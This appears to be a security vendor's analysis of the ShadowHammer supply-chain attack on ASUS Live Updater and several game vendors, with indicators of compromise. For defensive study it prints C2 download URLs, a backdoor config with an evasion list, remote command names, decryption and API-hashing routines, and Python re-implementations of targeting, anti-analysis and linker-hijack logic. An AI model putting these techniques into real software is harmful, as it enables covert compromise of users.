The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010. The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater. The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects the MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs. In other words, the malware iterates through the table of hashes and compares them to the MD5 hashes of the local adapters' MAC addresses. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the matching entry as a parameter in the request to identify the victim.
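The targeting logic just described can be restated in a few lines of Python. Note that the hash table below is a stand-in, and the exact string format the malware feeds into MD5 is an assumption on my part:

```python
# Conceptual re-implementation of the MAC-based targeting check; not
# decompiled malware code. The real samples carried 55+ hardcoded hashes.
import hashlib

TARGET_HASHES = set()   # stand-in for the sample's hardcoded table

def mac_hash(mac):
    # Assumed formatting; the actual byte layout hashed by the malware
    # may differ (e.g. raw bytes vs. a dash-separated string).
    return hashlib.md5(mac.encode("ascii")).hexdigest()

def pick_target_hash(adapter_macs):
    """Return the matching hash (sent back to the C2 as a parameter) or None."""
    for mac in adapter_macs:
        h = mac_hash(mac)
        if h in TARGET_HASHES:
            return h
    return None
```

On a non-targeted machine `pick_target_hash` returns None, which mirrors the described behavior of staying silent unless one adapter's hash appears in the table.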
The server response is expected to be executable shellcode, which is placed in newly allocated memory and started. Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables. For all users whose MAC did not match the expected values, the code would create an INI file located two directory levels above the current executable and named "idx.ini". Three values were written into the INI file under the [IDX_FILE] section:
[IDX_FILE]
XXX_IDN=YYYY-MM-DD
XXX_IDE=YYYY-MM-DD
XXX_IDX=YYYY-MM-DD
where YYYY-MM-DD is a date one week ahead of the current system date. The code injected by the attackers was discovered on the computers of over 57,000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of affected users around the world remains unknown. Digital signature abuse A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed. First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:
0ff067d801f7daeeae842e9fe5f610ea
05e6a0be5ac359c7ff11f4b467ab20fc
The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e.
ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates. All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts. Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, "Certificate Validity Period", which can help us to understand roughly the timeframe of the operation. Apparently, the attackers used two different certificates because the certificate they initially relied on expired in 2018 and therefore had to be reissued. Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA. The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for "Extended Validation" and imposes stricter requirements on the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate. This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know all of the software with injected malware that they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We immediately notified ASUS about this and provided evidence as required.
ASUS-related attack samples Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties: they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb” the shellcode from all of these samples connects to the same C2: asushotfix[.]com all samples were compiled between June and July 2018 the samples have been detected on computers all around the globe The hashes of these related samples include: 322cb39bc049aa69136925137906d855 36dd195269979e01a29e37c488928497 7d9d29c1c03461608bcab930fef2f568 807d86da63f0db1fc746d1f0b05bc357 849a2b0dc80aeca3d175c139efe5221c 86A4CAC227078B9C95C560C8F0370BF0 98908ce6f80ecc48628c8d2bf5b2a50c a4b42c2c95d1f2ff12171a01c86cd64f b4abe604916c04fe3dd8b9cb3d501d3f eac3e3ece94bc84e922ec077efb15edd 128CECC59C91C0D0574BC1075FE7CB40 88777aacd5f16599547926a4c9202862 These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea) valid from 2015-07-27 till 2018-08-01). The hashes of the larger installers/droppers include: 0f49621b06f2cdaac8850c6e9581a594 17a36ac3e31f3a18936552aff2c80249 At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. 
Locations where these files were detected include: asus\asus live update\temp\1\Setup.exe asus\asus live update\temp\2\Setup.exe asus\asus live update\temp\3\Setup.exe asus\asus live update\temp\5\Setup.exe asus\asus live update\temp\6\Setup.exe asus\asus live update\temp\9\Setup.exe Public reports of the attack While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message: The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number. Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal: The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018. In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update: Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses: In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018. Targets by MAC address We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. 
It turns out that the distribution is uneven and certain vendors were a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers' names: Some of the MAC addresses included on the target list were rather popular, e.g. 00-50-56-C0-00-08 belongs to the VMware virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which would make targeting more precise. However, it tells us that one of the targeted users used VMware, which is rather common for software engineers (for testing their software). Another popular MAC was 0C-5B-8F-27-9A-64, which is the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address. Interaction with ASUS The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting:
29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
30-Jan-2019 – created a preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared a hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
01-Feb-2019 – ASUS provided an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates.
14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack
08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS.
We appreciate the quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage, that there was no immediate risk of new infections, and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users' computers. Non-ASUS-related cases In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia. One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called "Infestation: Survivor Stories". It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, "the game was panned by critics and is considered one of the worst video games of all time". The game servers were taken offline on December 15, 2016. The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of "The War Z" and released by OP Productions, which put it in the Steam store in December 2012. On April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public. It seems that certain videogame companies picked up this available code and started making their own versions of the game.
One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web and IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website, and the homepage of Innovative Extremist lists Electronics Extreme as one of their partners. Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked.

However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it, and now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that must also be revoked. We believe that a poorly maintained development environment, leaked source code, as well as vulnerable production servers were at the core of the bad luck chasing this video game. Ironically, this game about infestation brought only trouble and a serious infection to its developers.

Several executable files from the popular FPS video game PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as of early April, Zepetto seems to have stopped using it at the end of February 2019. Some details about this case were announced in March 2019 by our colleagues at ESET; we had been working on it in parallel with ESET and uncovered some additional facts.

All these cases involve digitally signed binaries from three vendors based in three different Asian countries, signed with different certificates and unique chains of trust. What is common to these cases is the way the binaries were trojanized.
The code injection happened through modification of commonly used functions such as the CRT (C runtime), which is similar to the ASUS case. However, the implementation is very different in the case of the video game companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, nor did it overwrite unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases it starts at the beginning of the code section, as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victims' projects or injected malware on the premises of the breached companies at the time of project compilation.

Payload from non-ASUS-related cases

The payload included in the compromised video games is rather simple. First of all, it checks whether the process has administrative privileges. Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with malicious intent. The file contains a hardcoded miniconfig; an annotated example of the config is provided below:

C2 URL: https://nw.infestexe[.]com/version/last.php
Sleep time: 240000
Target tag: warz
Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe

Apparently, the backdoor was specifically created for this target, which is confirmed by the internal tag (the previous name of the game is "The War Z"). If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed.
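The pre-flight checks described above can be sketched in a few lines of Python. The process names come from the config above; the function name and the exact language-ID comparison are our assumptions for illustration, not code from the sample:

```python
# Hypothetical re-implementation (for illustration only) of the backdoor's
# pre-flight checks: bail out if an analysis tool is running or the
# system default language is Simplified Chinese or Russian.
UNWANTED = {"wireshark.exe", "perfmon.exe", "procmon64.exe",
            "procmon.exe", "procexp.exe", "procexp64.exe", "netmon.exe"}

# Windows language IDs: 0x0804 = Simplified Chinese, 0x0419 = Russian
BLOCKED_LANG_IDS = {0x0804, 0x0419}

def should_run(running_processes, lang_id):
    """Return True only if no monitoring tool is present and the
    system language is not on the blocklist."""
    if any(p.lower() in UNWANTED for p in running_processes):
        return False
    if lang_id in BLOCKED_LANG_IDS:
        return False
    return True
```

For example, `should_run(["explorer.exe", "ProcMon.exe"], 0x0409)` returns False because Process Monitor is running, even though the language (US English) is not blocked.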
It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution. After all checks are done, the malware gathers information about the system, including:

Network adapter MAC address
System username
System hostname and IP address
Windows version
CPU architecture
Current host FQDN
Domain name
Current executable file name
Drive C volume name and serial number
Screen resolution
System default language ID

This information is concatenated into one string using the following template: "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s". Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string "*&b0i0rong2Y7un1" and encoded with the Base64 algorithm. Later on, the drive serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.

The malware uses HTTP for communication with the C2 server and crafts HTTP headers on its own, with the following hardcoded User-Agent string: "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"

Interestingly, when the malware identifies the Windows version, it uses a long list:

Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows 8
Microsoft Windows Server 2012
Microsoft Windows 8.1
Microsoft Windows Server 2012 R2
Microsoft Windows 10
Microsoft Windows Server 2016

The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute.
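Based on the description above, the host-identifier derivation can be reproduced in Python. Only the XOR key and the Base64 step are taken from the sample; treating the serial number as an ASCII string and cycling the key over it are our assumptions:

```python
import base64

# Hardcoded XOR key observed in the sample
XOR_KEY = b"*&b0i0rong2Y7un1"

def make_host_id(drive_serial: str) -> str:
    """XOR the C: drive serial-number string with the hardcoded key
    (key repeated as needed) and Base64-encode the result.
    Note: the exact byte ordering inside the malware may differ;
    this is an illustrative sketch, not extracted code."""
    raw = drive_serial.encode("ascii")
    xored = bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(raw))
    return base64.b64encode(xored).decode("ascii")
```

Because XOR is its own inverse, decoding the Base64 value and applying the same key recovers the original serial string, which is how the attackers could match a beaconing host against a specific machine.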
The following commands were discovered:

DownUrlFile – download URL data to a file
DownRunUrlFile – download URL data to a file and execute it
RunUrlBinInMem – download URL data and run it as shellcode
UnInstall – set a registry flag to prevent the malware from starting

The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, so the files should be discoverable through forensic analysis.

Similarities between the ASUS attack and the non-ASUS-related cases

Although the ASUS case and the video game industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes in the trojanized games resembles the one used in the backdoored ASUS Updater tool.

ASUS case:

hash = 0
for c in string:
    hash = hash * 0x21
    hash = hash + c
return hash

Other cases:

hash = 0
for c in string:
    hash = hash * 0x83
    hash = hash + c
return hash & 0x7FFFFFFF

Pseudocode of the API hashing algorithm: ASUS case vs. other cases

Besides that, our behavior engine identified that the ASUS and other related samples are some of the only cases where IPHLPAPI.dll was used from within a shellcode embedded in a PE file. In the ASUS case, the function GetAdaptersAddresses from IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to the remote C&C servers.

ShadowPad connection

While investigating this case, we worked with several companies that had been abused in this wave of supply-chain attacks.
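The two pseudocode routines above translate directly into runnable Python. The multipliers and the final 31-bit mask come from the pseudocode; wrapping each step to 32 bits is our assumption, since the real implementations run on 32-bit registers:

```python
def api_hash_asus(name: bytes) -> int:
    # Multiply-by-0x21 rolling hash, as in the backdoored ASUS Updater.
    # The & 0xFFFFFFFF models 32-bit register wrap-around (our assumption).
    h = 0
    for c in name:
        h = (h * 0x21 + c) & 0xFFFFFFFF
    return h

def api_hash_games(name: bytes) -> int:
    # Multiply-by-0x83 variant from the trojanized games, with the
    # final result masked to 31 bits as in the pseudocode.
    h = 0
    for c in name:
        h = (h * 0x83 + c) & 0xFFFFFFFF
    return h & 0x7FFFFFFF
```

The structural identity of the two routines (same rolling multiply-add loop, differing only in multiplier and final mask) is one of the code-level links between the campaigns.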
Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect. Our analysis of this sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea), deployed by the attackers on the company's internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017. The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer.

The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As before, the attackers used at least two stages of C2 servers, where the first stage provides the backdoor with an encrypted next-stage C2 domain.

The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. The online documents we extracted from several backdoors were all created by the same user, under the name Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson of Valve Corporation. During the time of operation, these documents contained an ASCII block of text formatted as an RSA private key. Inside the private key, which would normally be pure Base64, there was an invalid character injection (the symbol "$"): the message between the two "$" characters in fact contained an encrypted second-stage C2 URL.
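The dead-drop parsing can be illustrated with a few lines of Python. The PEM block below is a mock-up we made for the example; only the "$"-delimiter trick is taken from the real documents, and the hidden string here is a placeholder, not a real C2:

```python
import re

# Mock-up of a dead-drop document: a fake RSA private key with the
# payload smuggled in between two "$" characters (invalid in Base64).
FAKE_PEM = """-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAn0tz$ZW5jcnlwdGVkLWMyLXVybA==$QyfQW6p
-----END RSA PRIVATE KEY-----"""

def extract_dead_drop(text: str) -> str:
    """Return the data hidden between the first pair of '$' characters,
    which in the real operation held an encrypted second-stage C2 URL."""
    m = re.search(r"\$(.+?)\$", text, re.DOTALL)
    return m.group(1) if m else ""
```

A casual viewer of the Google document would see what looks like a private key; only a parser that knows to look for the "$" markers recovers the payload.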
We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:

Jul 31: UDP://103.19.3[.]17:443
Aug 13: UDP://103.19.3[.]17:443
Oct 08: UDP://103.19.3[.]17:443
Oct 09: UDP://103.19.3[.]17:443
Oct 22: UDP://117.16.142[.]9:443
Nov 20: HTTPS://23.236.77[.]177:443
Nov 21: UDP://117.16.142[.]9:443
Nov 22: UDP://117.16.142[.]9:443
Nov 23: UDP://117.16.142[.]9:443
Nov 27: UDP://117.16.142[.]9:443
Nov 27: HTTPS://103.19.3[.]44:443
Nov 27: TCP://103.19.3[.]44:443
Nov 27: UDP://103.19.3[.]44:1194
Nov 27: HTTPS://23.236.77[.]175:443
Nov 29: HTTPS://23.236.77[.]175:443
Nov 29: UDP://103.19.3[.]43:443
Nov 30: HTTPS://23.236.77[.]177:443

The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA. Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk University (konkuk.ac.kr). This IP address range has previously been reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university's network to host their C2 infrastructure. The last address, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as "xTom Shanghai Limited". When accessed via its IP address, the server displays an error page from a Chinese web management package called BaoTa ("宝塔" in Chinese):

PlugX connection

While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms from multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (e.g.
md5: 5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012, if the compilation timestamp is anything to trust. Apparently, both pieces of code not only share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the Python function below:

from ctypes import c_uint32
from struct import unpack

def decrypt(data):
    # All four state variables are seeded from the first DWORD of the buffer
    p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]
    pos = 0
    decdata = ""
    while pos < len(data):
        p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value
        p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value
        p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value
        p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value
        decdata += chr(ord(data[pos]) ^ ((p1 % 256 + p2 % 256 + p3 % 256 + p4 % 256) % 256))
        pos += 1
    return decdata

While this does not indicate a strong connection to the PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with the PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.

Compromising software developers

All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file, patched by an external malicious application that implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via the ASUS update servers, which was detected by Kaspersky Lab products.
However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism: a trojanized development environment used by software developers in the organization.

In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign.

The attack comprises an infected Microsoft Incremental Linker and a malicious DLL module that gets loaded through the compromised linker. The malicious DLL hooks the file-open operation and redirects attempts to open a commonly used C++ runtime library during static linking. The redirect destination is a malicious .lib file, which gets linked into the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies the file redirection only if the name matches a hardcoded target file name.

So, was it a developer from a video game company who installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer's machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wake-up call to all software developers. If your company produces software, you should ask yourself:

Where does my development software come from?
Is the delivery process (download) of IDE distributions secure?
When did we last check the integrity of our development software?
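The decision logic of the hooked file-open can be sketched as follows. All names here are hypothetical placeholders (the real hook runs as native code inside the compromised linker process); only the check-target-then-redirect behavior is taken from the analysis above:

```python
# Illustrative sketch of the linker hook's decision logic: only when
# the hardcoded target executable is being linked is the request for
# the legitimate C++ runtime library rerouted to the planted one.
TARGET_EXE = "game_client.exe"        # hypothetical hardcoded target name
LEGIT_LIB = "libcpmt.lib"             # a commonly linked C++ runtime library
MALICIOUS_LIB = "C:\\temp\\evil.lib"  # hypothetical planted .lib file

def resolve_open(requested_path: str, output_name: str) -> str:
    """Mimic the hooked file-open call: return the path the linker
    will actually open for the requested library."""
    if (output_name.lower() == TARGET_EXE
            and requested_path.lower().endswith(LEGIT_LIB)):
        return MALICIOUS_LIB
    return requested_path
```

This selectivity is what made the technique quiet: every other build on the machine linked the genuine runtime and produced clean binaries.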
Other victims

During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens on TCP port 80 on the target system and responds to a specific URL pattern registered with the Windows HTTP Server API: http://+/requested.html. The malware responds to HTTP GET/POST requests matching this pattern and is not easy to discover, which can help it remain invisible for a long time.

Based on the malware's network behavior, we identified three further, previously unknown victims: a video game company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, whose servers responded with a confirmation to the malware protocol, indicating a compromise. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is custom-built and not widely used, we believe that the same threat actor or a related group is behind these further compromises. This expands the list of previously known usual targets.

Conclusions

While attacks on supply-chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from the compromise of their digital certificates, but it also raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. The current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known.
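A defender could probe suspect hosts for this listener by requesting the registered path. A minimal sketch follows; since the confirmation format of the malware protocol is not public, this only crafts the request, and any host answering on exactly /requested.html deserves a closer look:

```python
# Minimal sketch of a probe for the http://+/requested.html listener
# described above. We only build the raw request here; sending it and
# interpreting the reply are left to the analyst's environment.
def build_probe(host: str) -> bytes:
    """Craft a plain HTTP/1.1 GET for the URL registered by the backdoor."""
    return (
        f"GET /requested.html HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")

# To send it, for example:
#   import socket
#   s = socket.create_connection((host, 80), timeout=5)
#   s.sendall(build_probe(host))
#   reply = s.recv(4096)  # a meaningful answer on this exact path is suspicious
```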
What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. Does this mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line into their software-building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed.

At this unprecedented scale of operations, it is still a mystery why the attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers collected the victims' MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or the online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com.

We will keep tracking the ShadowPad activities and will inform you about new findings!
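For a quick manual check, a machine's primary MAC address can be read and normalized into the dashed format used throughout this report. This is only an illustration of the formatting step; the official checker tools above should be used for the actual comparison against the targeted list:

```python
import uuid

def primary_mac() -> str:
    """Return the machine's primary MAC address as AA-BB-CC-DD-EE-FF.
    Note: uuid.getnode() may fall back to a random 48-bit value if no
    hardware address can be read, so treat the result with care."""
    node = uuid.getnode()
    # Emit the six bytes most-significant first, two hex digits each
    return "-".join(f"{(node >> shift) & 0xFF:02X}" for shift in range(40, -8, -8))
```

The resulting string can then be compared against addresses named in this report, such as 00-50-56-C0-00-08.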
Indicators of compromise

C2 servers:

103.19.3[.]17
103.19.3[.]43
103.19.3[.]44
117.16.142[.]9
23.236.77[.]175
23.236.77[.]177

Malware samples and trojanized files:

02385ea5f8463a2845bfe362c6c659fa
915086d90596eb5903bcd5b02fd97e3e
04fb0ccf3ef309b1cd587f609ab0e81e
943db472b4fd0c43428bfc6542d11913
05eacf843b716294ea759823d8f4ab23
95b6adbcef914a4df092f4294473252f
063ff7cc1778e7073eacb5083738e6a2
98908ce6f80ecc48628c8d2bf5b2a50c
06c19cd73471f0db027ab9eb85edc607
9d86dff1a6b70bfdf44406417d3e068f
0e1cc8693478d84e0c5e9edb2dc8555c
a17cb9df43b31bd3dad620559d434e53
0f49621b06f2cdaac8850c6e9581a594
a283d5dea22e061c4ab721959e8f4a24
128cecc59c91c0d0574bc1075fe7cb40
a4b42c2c95d1f2ff12171a01c86cd64f
17a36ac3e31f3a18936552aff2c80249
a76a1fbfd45ad562e815668972267c70
1a0752f14f89891655d746c07da4de01
a96226b8c5599e3391c7b111860dd654
1b95ac1443eb486924ac4d399371397c
a9c750b7a3bbf975e69ef78850af0163
1d05380f3425d54e4ddfc4bacc21d90e
aa15eb28292321b586c27d8401703494
1e091d725b72aed432a03a505b8d617e
aac57bac5f849585ba265a6cd35fde67
2ffc4f0e240ff62a8703e87030a96e39
aafe680feae55bb6226ece175282f068
322cb39bc049aa69136925137906d855
abbb53e1b60ab7044dd379cf80042660
343ad9d459f4154d0d2de577519fb2d3
abbd7c949985748c353da68de9448538
36dd195269979e01a29e37c488928497
b042bc851cafd77e471fa0d90a082043
3c0a0e95ccedaaafb4b3f6fd514fd087
b044cd0f6aae371acf2e349ef78ab39e
496c224d10e1b39a22967a331f7de0a2
b257f366a9f5a065130d4dc99152ee10
4b8d5ae0ad5750233dc1589828da130b
b4abe604916c04fe3dd8b9cb3d501d3f
4fb4c6da73a0a380c6797e9640d7fa00
b572925a7286355ac9ebb12a9fc0cc79
5220c683de5b01a70487dac2440e0ecb
b96bd0bda90d3f28d3aa5a40816695ed
53886c6ebd47a251f11b44869f67163d
c0116d877d048b1ba87c0de6fd7c3fb2
55a7aa5f0e52ba4d78c145811c830107
c778fc8e816061420c537db2617e0297
5855ce7c4a3167f0e006310eb1c76313
cdb0a09067877f30189811c7aea3f253
5b6cd0a85996a7d47a8e9f8011d4ad3f
d07e6abebcf1f2119622c60ad0acf4fa
5eed18254d797ccea62d5b74d96b6795
d1ed421779c31df2a059fe0f91c24721
6186b317c8b6a9da3ca4c166e68883ea
d4c4813b21556dd478315734e1c7ae54
63606c861a63a8c60edcd80923b18f96
dc15e578401ad9b8f72c4d60b79fdf0f
63f2fe96de336b6097806b22b5ab941a
dca86d2a9eb6dc53f549860f103486a9
6ab5386b5ad294fc6ec4d5e47c9c2470
dd792f9185860e1464b4346254b2101b
6b38c772b2ffd7a7818780b29f51ccb2
